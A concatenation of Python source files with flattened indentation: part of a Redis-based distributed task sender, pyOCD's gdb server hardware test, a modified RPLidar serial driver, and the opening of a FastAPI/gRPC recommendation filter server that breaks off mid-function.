files[table].write('[\n')
while len(self.dumping_queues[table])>1:
files[table].write(self.dumping_queues[table].pop(0) + ',\n')
else:
time.sleep(.15)
for table in list(self.dumping_queues):
if self.dumping_queues[table]:
files[table].write(self.dumping_queues[table].pop(0) + '\n]')
files[table].close()
for _ in range(defaults.VREDIS_SENDER_THREAD_SEND):
Thread(target=_logger).start()
if self.dumping:
Thread(target=_dumper).start()
def process_stop(self):
def log_start():
print('[ use CTRL+PAUSE(win)/ALT+PAUSE(linux) to break ]')
print('[ORDER]:')
print(re.sub('"VREDIS_SCRIPT": "[^\n]+"', '"VREDIS_SCRIPT": "..."',json.dumps(self.order, indent=4)))
assert self.order['order']['settings'] is not None
if 'VREDIS_SCRIPT' in self.order['order']['settings']:
print('[SCRIPT_ENV]:')
print('\n{}'.format(self.order['order']['settings']['VREDIS_SCRIPT']))
limit = self.order['order']['settings']['VREDIS_LIMIT_LOG_WORKER_NUM'] if 'VREDIS_LIMIT_LOG_WORKER_NUM' \
in self.order['order']['settings'] else defaults.VREDIS_LIMIT_LOG_WORKER_NUM
print('[TASK]:')
t = ['taskid:{}'.format(self.taskid),'receive worker num:{}'.format(self.pubnum)]
if limit < self.pubnum:
t.append(' <over VREDIS_LIMIT_LOG_WORKER_NUM:{} limited quantities.>'.format(limit))
t.append(' <use from_settings funciton set the parameter VREDIS_LIMIT_LOG_WORKER_NUM to see more.>')
T = True
for idx,info in enumerate(self.start_worker):
if T and idx >= limit:
T = False
t.append('start workerid: ...') # 超过指定数量的的任务名不显示。
if T: t.append('start workerid:{}'.format(info['workerid']))
print(json.dumps(t, indent=4))
if self.loginfo: log_start()
workerids = [i['workerid']for i in self.start_worker.copy()]
workeridd = {i['workerid']:i['plus'] for i in self.start_worker.copy()}
while self.keepalive and not self.taskstop:
stopinfo = from_pipeline(self, self.taskid, 'stop')
if stopinfo and 'taskid' in stopinfo:
workerids.remove(stopinfo['workerid'])
elif not workerids:
self.taskstop = True
else:
for workerid in workerids:
if not check_connect_worker(self.rds, workerid, workeridd):
t = True
# 异常 worker 缓冲区中的内容重新传回目标任务,并且不只是这里, worker 端也会有同样的处理,
# 不过在 worker 里面的处理因为防止信号爆炸的关系,只是挂钩在任务结束时才会进行清理。
_rname = '{}:{}'.format(defaults.VREDIS_TASK, self.taskid)
_cname = '{}:{}:{}'.format(defaults.VREDIS_TASK_CACHE, self.taskid, workerid)
while self.rds.llen(_cname) != 0:
t = False
self.rds.brpoplpush(_cname, _rname, defaults.VREDIS_TASK_TIMEOUT)
if t:
print('unknown crash error stop workerid:{}'.format(workerid))
workerids.remove(workerid)
# 通过一个队列来接受状态回写
def send_status(self):
start_worker = []
for _ in range(self.pubnum):
worker = from_pipeline(self, self.taskid, 'start')
if worker:
if worker['msg'] is None:
start_worker.append(worker)
else:
# 在 start 阶段如果 msg 内有数据的话,那么就是开启时出现了错误。进行开始阶段的错误回写即可。
print(worker['msg'])
self.start_worker = start_worker
hookcrash = {i['workerid']:i['plus'] for i in self.start_worker.copy()}
self.rds.hset(defaults.VREDIS_SENDER, '{}@hookcrash'.format(self.taskid), json.dumps(hookcrash))
if self.start_worker:
self.start() # 开启debug状态将额外开启两个线程作为输出日志的同步
else:
self.logstop = True
print('none worker receive task.')
def get_taskid(self):
self.taskid = self.taskid if hasattr(self,'taskid') else \
self.rds.hincrby(defaults.VREDIS_SENDER,defaults.VREDIS_SENDER_ID)
return self.taskid
def send(self, input_order, loginfo=True, keepalive=True, dumping=False):
self.taskstop = False
self.logstop = False # 用于在 cmdline 内对命令返回输出结束挂钩
self.loginfo = loginfo
self.keepalive = keepalive
self.dumping = dumping
def wait_connect_pub_sender(self):
rname = '{}:{}'.format(defaults.VREDIS_PUBLISH_SENDER, self.taskid)
cursub = self.rds.pubsub_numsub(rname)[0][1]
self.pub = self.rds.pubsub()
self.pub.subscribe(rname)
while self.rds.pubsub_numsub(rname)[0][1] == cursub:
time.sleep(.15)
self.pubn = int(self.rds.pubsub_numsub(rname)[0][1]) # 一个源于redis自身的问题,这里不一定是1,所以需要进行传递处理。
self.rds.hset(defaults.VREDIS_WORKER, '{}@inter'.format(self.taskid), 1)
# 获取任务id 并广播出去,一个对象维护一个taskid
self.get_taskid()
wait_connect_pub_sender(self) # 发送任务前需要等待自连接广播打开,用于任意形式发送端断开能被工作端检测到
self.order = {'taskid':self.taskid, 'order':{**checked_order(input_order),**{'sender_pubn':self.pubn}}}
self.pubnum = self.rds.publish(defaults.VREDIS_PUBLISH_WORKER, json.dumps(self.order))
self.send_status()
return self.taskid
def send_execute(self, taskid, function_name, args, kwargs, plus, keepalive=True):
if not keepalive:
send_to_pipeline_execute(self, taskid, function_name, args, kwargs, plus)
elif self.start_worker:
send_to_pipeline_execute(self, taskid, function_name, args, kwargs, plus)
def get_stat(self, taskid):
workeridd = self.rds.hget(defaults.VREDIS_SENDER, '{}@hookcrash'.format(taskid))
if workeridd is not None:
workeridd = json.loads(workeridd)
d = {}
collection = 0
execute = 0
fail = 0
rname = '{}:{}'.format(defaults.VREDIS_TASK, taskid)
for workerid in workeridd:
_name = '{}:{}:{}'.format(defaults.VREDIS_TASK_STATE, taskid, workerid)
t = {}
_collection = int(self.rds.hget(_name, 'collection') or 0)
_execute = int(self.rds.hget(_name, 'execute') or 0)
_fail = int(self.rds.hget(_name, 'fail') or 0)
_stop = int(self.rds.hget(_name, 'stop') or 0)
t['collection'] = _collection
t['execute'] = _execute
t['fail'] = _fail
t['stop'] = _stop
d[workerid] = t
collection += _collection
execute += _execute
fail += _fail
d['all'] = {'collection':collection,'execute':execute,'fail':fail,'tasknum':self.rds.llen(rname)}
return d
|
gdb_test.py
|
# pyOCD debugger
# Copyright (c) 2015-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
# Note
# To run this script GNU Tools ARM Embedded must be installed,
# along with python for the same architecture. The program
# "arm-none-eabi-gdb-py.exe" requires python for the same
# architecture (x86 or 64) to work correctly. Also, on windows
# the GNU Tools ARM Embedded bin directory needs to be added to
# your path.
import os
import json
import sys
from subprocess import (
Popen,
STDOUT,
PIPE,
check_output,
)
import argparse
import logging
import traceback
import threading
from pyocd.__main__ import PyOCDTool
from pyocd.core.helpers import ConnectHelper
from pyocd.utility.compatibility import to_str_safe
from pyocd.core.memory_map import MemoryType
from pyocd.flash.file_programmer import FileProgrammer
from test_util import (
Test,
TestResult,
get_session_options,
get_target_test_params,
binary_to_elf_file,
get_env_file_name,
get_test_binary_path,
TEST_DIR,
TEST_OUTPUT_DIR,
ensure_output_dir,
wait_with_deadline,
)
# TODO, c1728p9 - run script several times with
# with different command line parameters
LOG = logging.getLogger(__name__)
PYTHON_GDB = "arm-none-eabi-gdb-py"
TEST_TIMEOUT_SECONDS = 60.0 * 5
GDB_SCRIPT_PATH = os.path.join(TEST_DIR, "gdb_test_script.py")
class GdbTestResult(TestResult):
def __init__(self):
super(self.__class__, self).__init__(None, None, None)
self.name = "gdbserver"
class GdbTest(Test):
def __init__(self):
super(self.__class__, self).__init__("Gdb Test", test_gdb)
def run(self, board):
try:
result = self.test_function(board.unique_id, self.n)
except Exception as e:
result = GdbTestResult()
result.passed = False
print("Exception %s when testing board %s" %
(e, board.unique_id))
traceback.print_exc(file=sys.stdout)
result.board = board
result.test = self
return result
TEST_RESULT_KEYS = [
"breakpoint_count",
"watchpoint_count",
"step_time_si",
"step_time_s",
"step_time_n",
"fail_count",
]
def test_gdb(board_id=None, n=0):
temp_test_elf_name = None
result = GdbTestResult()
with ConnectHelper.session_with_chosen_probe(unique_id=board_id, **get_session_options()) as session:
board = session.board
memory_map = board.target.get_memory_map()
ram_region = memory_map.get_default_region_of_type(MemoryType.RAM)
rom_region = memory_map.get_boot_memory()
target_type = board.target_type
binary_file = get_test_binary_path(board.test_binary)
if board_id is None:
board_id = board.unique_id
target_test_params = get_target_test_params(session)
test_port = 3333 + n
telnet_port = 4444 + n
# Hardware breakpoints are not supported above 0x20000000 on
# Cortex-M devices with FPB revision 1.
fpb = session.target.selected_core.fpb
assert fpb is not None
ignore_hw_bkpt_result = int(fpb.revision == 1 and ram_region.start >= 0x20000000)
# Program with initial test image
FileProgrammer(session).program(binary_file, base_address=rom_region.start)
# Generate an elf from the binary test file.
temp_test_elf_name = binary_to_elf_file(binary_file, rom_region.start)
# Write out the test configuration
test_params = {
"test_port" : test_port,
"rom_start" : rom_region.start,
"rom_length" : rom_region.length,
"ram_start" : ram_region.start,
"ram_length" : ram_region.length,
"invalid_start" : 0x3E000000,
"invalid_length" : 0x1000,
"expect_error_on_invalid_access" : target_test_params['error_on_invalid_access'],
"ignore_hw_bkpt_result" : ignore_hw_bkpt_result,
"test_elf" : temp_test_elf_name,
}
test_param_filename = os.path.join(TEST_OUTPUT_DIR, "gdb_test_params%s_%d.txt" % (get_env_file_name(), n))
with open(test_param_filename, "w") as f:
f.write(json.dumps(test_params))
# Remove result from previous run.
test_result_filename = os.path.join(TEST_OUTPUT_DIR, "gdb_test_results%s_%d.txt" % (get_env_file_name(), n))
if os.path.exists(test_result_filename):
os.remove(test_result_filename)
# Run the test
gdb_args = [PYTHON_GDB, "--nh", "-ex", "set $testn=%d" % n, "--command=%s" % GDB_SCRIPT_PATH]
gdb_output_filename = os.path.join(TEST_OUTPUT_DIR, "gdb_output%s_%s_%d.txt" % (get_env_file_name(), board.target_type, n))
with open(gdb_output_filename, "w") as f:
LOG.info('Starting gdb (stdout -> %s): %s', gdb_output_filename, ' '.join(gdb_args))
gdb_program = Popen(gdb_args, stdin=PIPE, stdout=f, stderr=STDOUT)
server_args = ['gdbserver',
'--port=%i' % test_port,
"--telnet-port=%i" % telnet_port,
"--frequency=%i" % target_test_params['test_clock'],
"--uid=%s" % board_id,
]
server = PyOCDTool()
LOG.info('Starting gdbserver: %s', ' '.join(server_args))
server_thread = threading.Thread(target=server.run, args=[server_args])
server_thread.daemon = True
server_thread.start()
LOG.info('Waiting for gdb to finish...')
did_complete = wait_with_deadline(gdb_program, TEST_TIMEOUT_SECONDS)
LOG.info('Waiting for server to finish...')
server_thread.join(timeout=TEST_TIMEOUT_SECONDS)
if not did_complete:
LOG.error("Test timed out!")
if server_thread.is_alive():
LOG.error('Server is still running!')
try:
with open(gdb_output_filename, 'r') as f:
LOG.debug('Gdb output:\n%s', f.read())
except IOError:
pass
# Read back the result
result.passed = False
if did_complete:
try:
with open(test_result_filename, "r") as f:
test_result = json.loads(f.read())
# Print results
if set(TEST_RESULT_KEYS).issubset(test_result):
print("----------------Test Results----------------")
print("HW breakpoint count: %s" % test_result["breakpoint_count"])
print("Watchpoint count: %s" % test_result["watchpoint_count"])
print("Average instruction step time: %s" %
test_result["step_time_si"])
print("Average single step time: %s" % test_result["step_time_s"])
print("Average over step time: %s" % test_result["step_time_n"])
print("Failure count: %i" % test_result["fail_count"])
result.passed = test_result["fail_count"] == 0
except IOError as err:
LOG.error("Error reading test results: %s", err, exc_info=True)
if result.passed:
print("GDB TEST PASSED")
else:
print("GDB TEST FAILED")
# Cleanup
try:
if temp_test_elf_name and os.path.exists(temp_test_elf_name):
os.remove(temp_test_elf_name)
os.remove(test_result_filename)
os.remove(test_param_filename)
except IOError as err:
pass
return result
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='pyOCD gdb test')
parser.add_argument('-d', '--debug', action="store_true", help='Enable debug logging')
args = parser.parse_args()
level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(level=level)
ensure_output_dir()
test_gdb()
|
rplidar-save.py
|
'''Simple and lightweight module for working with RPLidar rangefinder scanners.
Usage example:
>>> from rplidar import RPLidar
>>> lidar = RPLidar('/dev/ttyUSB0')
>>>
>>> info = lidar.get_info()
>>> print(info)
>>>
>>> health = lidar.get_health()
>>> print(health)
>>>
>>> for i, scan in enumerate(lidar.iter_scans()):
... print('%d: Got %d measurments' % (i, len(scan)))
... if i > 10:
... break
...
>>> lidar.stop()
>>> lidar.stop_motor()
>>> lidar.disconnect()
For additional information please refer to the RPLidar class documentation.
'''
# import logging
import sys
import time
import codecs
import serial
import struct
from threading import Thread
SYNC_BYTE = b'\xA5'
SYNC_BYTE2 = b'\x5A'
GET_INFO_BYTE = b'\x50'
GET_HEALTH_BYTE = b'\x52'
STOP_BYTE = b'\x25'
RESET_BYTE = b'\x40'
SCAN_BYTE = b'\x20'
FORCE_SCAN_BYTE = b'\x21'
DESCRIPTOR_LEN = 7
INFO_LEN = 20
HEALTH_LEN = 3
INFO_TYPE = 4
HEALTH_TYPE = 6
SCAN_TYPE = 129
#Constants & Command to start A2 motor
MAX_MOTOR_PWM = 1023
DEFAULT_MOTOR_PWM = 660
SET_PWM_BYTE = b'\xF0'
_HEALTH_STATUSES = {
0: 'Good',
1: 'Warning',
2: 'Error',
}
PY3 = True if (int(sys.version[0]) == 3) else False
class RPLidarException(Exception):
'''Basic exception class for RPLidar'''
def _b2i(byte):
'''Converts byte to integer (for Python 2 compatability)'''
return byte if PY3 else ord(byte)
def _process_scan(raw):
'''Processes input raw data and returns measurment data'''
new_scan = bool(_b2i(raw[0]) & 0b1)
inversed_new_scan = bool((_b2i(raw[0]) >> 1) & 0b1)
quality = _b2i(raw[0]) >> 2
if new_scan == inversed_new_scan:
raise RPLidarException('New scan flags mismatch')
check_bit = _b2i(raw[1]) & 0b1
if check_bit != 1:
raise RPLidarException('Check bit not equal to 1')
angle = ((_b2i(raw[1]) >> 1) + (_b2i(raw[2]) << 7)) / 64.
distance = (_b2i(raw[3]) + (_b2i(raw[4]) << 8)) / 4.
return (new_scan, quality, angle, distance,)
class RPLidar(object):
'''Class for communicating with RPLidar rangefinder scanners'''
_serial_port = None #: serial port connection
# port = '' #: Serial port name, e.g. /dev/ttyUSB0
# timeout = 1 #: Serial port timeout
# motor = False #: Is motor running?
# baudrate = 115200 #: Baudrate for serial port
# def __init__(self, port, baudrate=115200, timeout=1, logger=None):
def __init__(self, logger=None):
'''Initilize RPLidar object for communicating with the sensor.
Parameters
----------
port : str
Serial port name to which sensor is connected
baudrate : int, optional
Baudrate for serial connection (the default is 115200)
timeout : float, optional
Serial port connection timeout in seconds (the default is 1)
logger : logging.Logger instance, optional
Logger instance, if none is provided new instance is created
'''
# self._serial_port = None
# self.port = port
# self.baudrate = baudrate
# self.timeout = timeout
self.motor_running = False
# if logger is None:
# logger = logging.getLogger(__name__)
# self.logger = logger
# self.open(port, baudrate, timeout)
# self.start_motor()
self.scan = [(0,0,)]*360
self.shutdown = False
def __del__(self):
# self.stop()
self.shutdown = True
if self._serial_port:
self.stop_motor()
self.close()
print("bye")
def start(self):
self.shutdown = False
t = Thread(target=self.update, name="rplidar", args=())
t.daemon = True
t.start()
return
def open(self, port, baudrate=115200, timeout=1):
'''Connects to the serial port with the name `self.port`. If it was
connected to another serial port disconnects from it first.'''
if self._serial_port is not None:
self.close()
try:
self._serial_port = serial.Serial(
port,
baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
timeout=timeout,
dsrdtr=True)
except serial.SerialException as err:
raise RPLidarException('Failed: %s' % err)
# self.reset()
def close(self):
'''Disconnects from the serial port'''
self.stop()
self.shutdown = True
time.sleep(0.1)
if self._serial_port.is_open:
self._serial_port.close()
self._serial_port = None
def set_pwm(self, pwm):
assert(0 <= pwm <= MAX_MOTOR_PWM)
payload = struct.pack("<H", pwm)
self._send_payload_cmd(SET_PWM_BYTE, payload)
def start_motor(self):
'''Starts sensor motor'''
if self.motor_running:
return
# self.logger.info('Starting motor')
# For A1
self._serial_port.dtr = False
# For A2
self.set_pwm(DEFAULT_MOTOR_PWM)
self.motor_running = True
def stop_motor(self):
'''Stops sensor motor'''
if not self.motor_running:
return
# self.logger.info('Stoping motor')
# For A2
self.set_pwm(0)
time.sleep(.001)
# For A1
self._serial_port.dtr = True
self.motor_running = False
def _send_payload_cmd(self, cmd, payload):
'''Sends `cmd` command with `payload` to the sensor'''
size = struct.pack('B', len(payload))
req = SYNC_BYTE + cmd + size + payload
checksum = 0
for v in struct.unpack('B'*len(req), req):
checksum ^= v
req += struct.pack('B', checksum)
self._serial_port.write(req)
# self.logger.debug('Command sent: %s' % req)
def _send_cmd(self, cmd):
'''Sends `cmd` command to the sensor'''
req = SYNC_BYTE + cmd
if self._serial_port:
self._serial_port.write(req)
# self.logger.debug('Command sent: %s' % req)
def _read_descriptor(self):
'''Reads descriptor packet'''
descriptor = self._serial_port.read(DESCRIPTOR_LEN)
# self.logger.debug('Recieved descriptor: %s', descriptor)
if len(descriptor) != DESCRIPTOR_LEN:
raise RPLidarException('Descriptor length mismatch')
elif not descriptor.startswith(SYNC_BYTE + SYNC_BYTE2):
raise RPLidarException('Incorrect descriptor starting bytes')
is_single = _b2i(descriptor[-2]) == 0
return _b2i(descriptor[2]), is_single, _b2i(descriptor[-1])
def _read_response(self, dsize):
'''Reads response packet with length of `dsize` bytes'''
# self.logger.debug('Trying to read response: %d bytes', dsize)
if self._serial_port:
data = self._serial_port.read(dsize)
# self.logger.debug('Recieved data: %s', data)
if len(data) != dsize:
raise RPLidarException('Wrong body size')
return data
def info(self):
'''Get device information
Returns
-------
dict
Dictionary with the sensor information
'''
self._send_cmd(GET_INFO_BYTE)
dsize, is_single, dtype = self._read_descriptor()
if dsize != INFO_LEN:
raise RPLidarException('Wrong get_info reply length')
if not is_single:
raise RPLidarException('Not a single response mode')
if dtype != INFO_TYPE:
raise RPLidarException('Wrong response data type')
raw = self._read_response(dsize)
serialnumber = codecs.encode(raw[4:], 'hex').upper()
serialnumber = codecs.decode(serialnumber, 'ascii')
data = {
'model': _b2i(raw[0]),
'firmware': (_b2i(raw[2]), _b2i(raw[1])),
'hardware': _b2i(raw[3]),
'serialnumber': serialnumber,
}
return data
def health(self):
'''Get device health state. When the core system detects some
potential risk that may cause hardware failure in the future,
the returned status value will be 'Warning'. But sensor can still work
as normal. When sensor is in the Protection Stop state, the returned
status value will be 'Error'. In case of warning or error statuses
non-zero error code will be returned.
Returns
-------
status : str
'Good', 'Warning' or 'Error' statuses
error_code : int
The related error code that caused a warning/error.
'''
self._send_cmd(GET_HEALTH_BYTE)
dsize, is_single, dtype = self._read_descriptor()
if dsize != HEALTH_LEN:
raise RPLidarException('Wrong get_info reply length')
if not is_single:
raise RPLidarException('Not a single response mode')
if dtype != HEALTH_TYPE:
raise RPLidarException('Wrong response data type')
raw = self._read_response(dsize)
status = _HEALTH_STATUSES[_b2i(raw[0])]
error_code = (_b2i(raw[1]) << 8) + _b2i(raw[2])
return status, error_code
# def clear_input(self):
# '''Clears input buffer by reading all available data'''
# self._serial_port.read_all()
def stop(self):
'''Stops scanning process, disables laser diode and the measurment
system, moves sensor to the idle state.'''
# self.logger.info('Stoping scanning')
self._send_cmd(STOP_BYTE)
time.sleep(.001)
self.stop_motor()
# self.clear_input()
self._serial_port.read_all()
def reset(self):
'''Resets sensor core, reverting it to a similar state as it has
just been powered up.'''
# self.logger.info('Reseting the sensor')
self._send_cmd(RESET_BYTE)
time.sleep(.002)
# def iter_measurments(self, max_buf_meas=500):
# '''Iterate over measurments. Note that consumer must be fast enough,
# otherwise data will be accumulated inside buffer and consumer will get
# data with increaing lag.
#
# Parameters
# ----------
# max_buf_meas : int
# Maximum number of measurments to be stored inside the buffer. Once
# numbe exceeds this limit buffer will be emptied out.
#
# Yields
# ------
# new_scan : bool
# True if measurment belongs to a new scan
# quality : int
# Reflected laser pulse strength
# angle : float
# The measurment heading angle in degree unit [0, 360)
# distance : float
# Measured object distance related to the sensor's rotation center.
# In millimeter unit. Set to 0 when measurment is invalid.
# '''
# self.start_motor()
# status, error_code = self.get_health()
# # self.logger.debug('Health status: %s [%d]', status, error_code)
# if status == _HEALTH_STATUSES[2]:
# # self.logger.warning('Trying to reset sensor due to the error. '
# # 'Error code: %d', error_code)
# self.reset()
# status, error_code = self.get_health()
# if status == _HEALTH_STATUSES[2]:
# raise RPLidarException('RPLidar hardware failure. '
# 'Error code: %d' % error_code)
# # elif status == _HEALTH_STATUSES[1]:
# # self.logger.warning('Warning sensor status detected! '
# # 'Error code: %d', error_code)
# cmd = SCAN_BYTE
# self._send_cmd(cmd)
# dsize, is_single, dtype = self._read_descriptor()
# if dsize != 5:
# raise RPLidarException('Wrong get_info reply length')
# if is_single:
# raise RPLidarException('Not a multiple response mode')
# if dtype != SCAN_TYPE:
# raise RPLidarException('Wrong response data type')
# while True:
# raw = self._read_response(dsize)
# # self.logger.debug('Recieved scan response: %s' % raw)
# if max_buf_meas:
# data_in_buf = self._serial_port.in_waiting
# if data_in_buf > max_buf_meas*dsize:
# # self.logger.warning(
# # 'Too many measurments in the input buffer: %d/%d. '
# # 'Clearing buffer...',
# # data_in_buf//dsize, max_buf_meas)
# self._serial_port.read(data_in_buf//dsize*dsize)
# print("oops")
# yield _process_scan(raw)
# def iter_scans(self, max_buf_meas=500, min_len=5):
# '''Iterate over scans. Note that consumer must be fast enough,
# otherwise data will be accumulated inside buffer and consumer will get
# data with increasing lag.
#
# Parameters
# ----------
# max_buf_meas : int
# Maximum number of measurments to be stored inside the buffer. Once
# numbe exceeds this limit buffer will be emptied out.
# min_len : int
# Minimum number of measurments in the scan for it to be yelded.
#
# Yields
# ------
# scan : list
# List of the measurments. Each measurment is tuple with following
# format: (quality, angle, distance). For values description please
# refer to `iter_measurments` method's documentation.
# '''
# scan = []
# iterator = self.iter_measurments(max_buf_meas)
# for new_scan, quality, angle, distance in iterator:
# if new_scan:
# if len(scan) > min_len:
# # scan = list(reversed(scan))
# yield scan
# scan = []
# if quality > 0 and distance > 0:
# scan.append((quality, angle, distance))
def get(self, max_buf_meas=500):
'''Iterate over measurments. Note that consumer must be fast enough,
otherwise data will be accumulated inside buffer and consumer will get
data with increaing lag.
Parameters
----------
max_buf_meas : int
Maximum number of measurments to be stored inside the buffer. Once
numbe exceeds this limit buffer will be emptied out.
Yields
------
new_scan : bool
True if measurment belongs to a new scan
quality : int
Reflected laser pulse strength
angle : float
The measurment heading angle in degree unit [0, 360)
distance : float
Measured object distance related to the sensor's rotation center.
In millimeter unit. Set to 0 when measurment is invalid.
'''
return self.scan
# self.start_motor()
# status, error_code = self.health()
# # self.logger.debug('Health status: %s [%d]', status, error_code)
# if status == _HEALTH_STATUSES[2]:
# # self.logger.warning('Trying to reset sensor due to the error. '
# # 'Error code: %d', error_code)
# self.reset()
# status, error_code = self.health()
# if status == _HEALTH_STATUSES[2]:
# raise RPLidarException('RPLidar hardware failure. '
# 'Error code: %d' % error_code)
# # elif status == _HEALTH_STATUSES[1]:
# # self.logger.warning('Warning sensor status detected! '
# # 'Error code: %d', error_code)
# cmd = SCAN_BYTE
# self._send_cmd(cmd)
# dsize, is_single, dtype = self._read_descriptor()
# if dsize != 5:
# raise RPLidarException('Wrong get_info reply length')
# if is_single:
# raise RPLidarException('Not a multiple response mode')
# if dtype != SCAN_TYPE:
# raise RPLidarException('Wrong response data type')
#
# scan = [(0,0,)]*360
# done = False
# while not done:
# raw = self._read_response(dsize)
# # print('raw', raw)
# # self.logger.debug('Recieved scan response: %s' % raw)
# if max_buf_meas:
# data_in_buf = self._serial_port.in_waiting
# if data_in_buf > max_buf_meas*dsize:
# # self.logger.warning(
# # 'Too many measurments in the input buffer: %d/%d. '
# # 'Clearing buffer...',
# # data_in_buf//dsize, max_buf_meas)
# self._serial_port.read(data_in_buf//dsize*dsize)
# iterator = _process_scan(raw)
#
# print(iterator)
#
# # for new_scan, quality, angle, distance in iterator:
# new_scan, quality, angle, distance = iterator
# if new_scan:
# # done = True
# print(scan)
# if quality > 0 and distance > 0:
# # print('>>', angle, distance)
# # scan.append((angle, distance,))
# scan[int(angle)] = (angle, distance,)
#
# print('<<< get done >>>')
# return scan
def update(self):
# max_buf_meas=500 # ??
self.start_motor()
status, error_code = self.health()
# self.logger.debug('Health status: %s [%d]', status, error_code)
if status == _HEALTH_STATUSES[2]:
# self.logger.warning('Trying to reset sensor due to the error. '
# 'Error code: %d', error_code)
self.reset()
status, error_code = self.health()
if status == _HEALTH_STATUSES[2]:
raise RPLidarException('RPLidar hardware failure. '
'Error code: %d' % error_code)
# elif status == _HEALTH_STATUSES[1]:
# self.logger.warning('Warning sensor status detected! '
# 'Error code: %d', error_code)
cmd = SCAN_BYTE
self._send_cmd(cmd)
dsize, is_single, dtype = self._read_descriptor()
if dsize != 5:
raise RPLidarException('Wrong get_info reply length')
if is_single:
raise RPLidarException('Not a multiple response mode')
if dtype != SCAN_TYPE:
raise RPLidarException('Wrong response data type')
self.scan = [(0,0,)]*360
# done = False
while not self.shutdown:
raw = self._read_response(dsize)
if self._serial_port.in_waiting > 0:
print("still waiting", self._serial_port.in_waiting)
# print('raw', raw)
# self.logger.debug('Recieved scan response: %s' % raw)
# if max_buf_meas:
# data_in_buf = self._serial_port.in_waiting
# if data_in_buf > max_buf_meas*dsize and self._serial_port:
# # self.logger.warning(
# # 'Too many measurments in the input buffer: %d/%d. '
# # 'Clearing buffer...',
# # data_in_buf//dsize, max_buf_meas)
# self._serial_port.read(data_in_buf//dsize*dsize)
iterator = _process_scan(raw)
# print(iterator)
# for new_scan, quality, angle, distance in iterator:
new_scan, quality, angle, distance = iterator
if new_scan:
# done = True
# print(scan)
self.scan = [(0,0,)]*360
if quality > 0 and distance > 0:
# print('>>', angle, distance)
# scan.append((angle, distance,))
self.scan[int(angle)] = (angle, distance,)
# def update2(self):
# self.start_motor()
# status, error_code = self.get_health()
# # self.logger.debug('Health status: %s [%d]', status, error_code)
# if status == _HEALTH_STATUSES[2]:
# # self.logger.warning('Trying to reset sensor due to the error. '
# # 'Error code: %d', error_code)
# self.reset()
# status, error_code = self.get_health()
# if status == _HEALTH_STATUSES[2]:
# raise RPLidarException('RPLidar hardware failure. '
# 'Error code: %d' % error_code)
# # elif status == _HEALTH_STATUSES[1]:
# # self.logger.warning('Warning sensor status detected! '
# # 'Error code: %d', error_code)
# cmd = SCAN_BYTE
# self._send_cmd(cmd)
# dsize, is_single, dtype = self._read_descriptor()
# if dsize != 5:
# raise RPLidarException('Wrong get_info reply length')
# if is_single:
# raise RPLidarException('Not a multiple response mode')
# if dtype != SCAN_TYPE:
# raise RPLidarException('Wrong response data type')
# while not self.shutdown:
# raw = self._read_response(dsize)
# # self.logger.debug('Recieved scan response: %s' % raw)
# # if max_buf_meas:
# # data_in_buf = self._serial_port.in_waiting
# # if data_in_buf > max_buf_meas*dsize:
# # # self.logger.warning(
# # # 'Too many measurments in the input buffer: %d/%d. '
# # # 'Clearing buffer...',
# # # data_in_buf//dsize, max_buf_meas)
# # self._serial_port.read(data_in_buf//dsize*dsize)
# # print("oops")
# # yield _process_scan(raw)
|
server.py
|
import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
import os
import logging
import json
from google.protobuf import any_pb2
import grpc
import time
from threading import Thread
import sys
import redis
import cache
import service_pb2
import service_pb2_grpc
import boto3
s3client = None
app = FastAPI()
# Mandatory variables in envirnment
MANDATORY_ENV_VARS = {
'AWS_REGION': 'ap-northeast-1',
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'FILTER_PORT': 5200
}
# Notice channel
rank_notice_to_filter='rank_notice_to_filter'
sleep_interval = 10 #second
pickle_type = 'inverted-list'
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
@app.get('/filter/status', tags=["monitoring"])
def status():
logging.info('Collecting status information from server & plugin...')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
statusAny = any_pb2.Any()
response.status.Unpack(statusAny)
pStatus = json.loads(statusAny.value.decode('utf-8'))
return {
'env': MANDATORY_ENV_VARS,
'redis': rCache.connection_status(),
'plugin_status': pStatus
}
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request...')
return { 'result': 'ping' }
@app.get('/filter/get_recommend_data', tags=["filter_to_plugin"])
def get_recommend_data(userId: str, recommendType: str):
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', recommendType)
logging.info('start get_recommend_data')
request = any_pb2.Any()
request.value = json.dumps({
'user_id': userId,
'recommend_type': recommendType
}).encode('utf-8')
logging.info('Invoke plugin to get recommend data...')
getFilterDataRequest = service_pb2.GetFilterDataRequest(apiVersion='v1', metadata='Filter', type='RecommendResult')
getFilterDataRequest.requestBody.Pack(request)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.GetFilterData(getFilterDataRequest)
results = any_pb2.Any()
response.results.Unpack(results)
resultJson = json.loads(results.value, encoding='utf-8')
if response.code == 0:
return {
'code': response.code,
'description': response.description,
'data': resultJson['data']
}
else:
return {
'code': -1,
'description': 'failed to get recommend data',
'data': ''
}
@xasync
def poll_rank_notice_to_filter():
logging.info('poll_rank_notice_to_filter start')
while True:
try:
message_redis = rCache.lpop_data_from_list(rank_notice_to_filter)
if message_redis:
logging.info('get message {} from {}'.format(message_redis, rank_notice_to_filter))
message = json.loads(message_redis, encoding='utf-8')
user_id = message['user_id']
rank_result = message['rank_result']
recall_result = message['recall_result']
logging.info('start filter_process in poll_rank_notice_to_filter')
logging.info('user_id {}'.format(user_id))
logging.info('rank_result {}'.format(rank_result))
logging.info('recall_result {}'.format(recall_result))
reqDicts = any_pb2.Any()
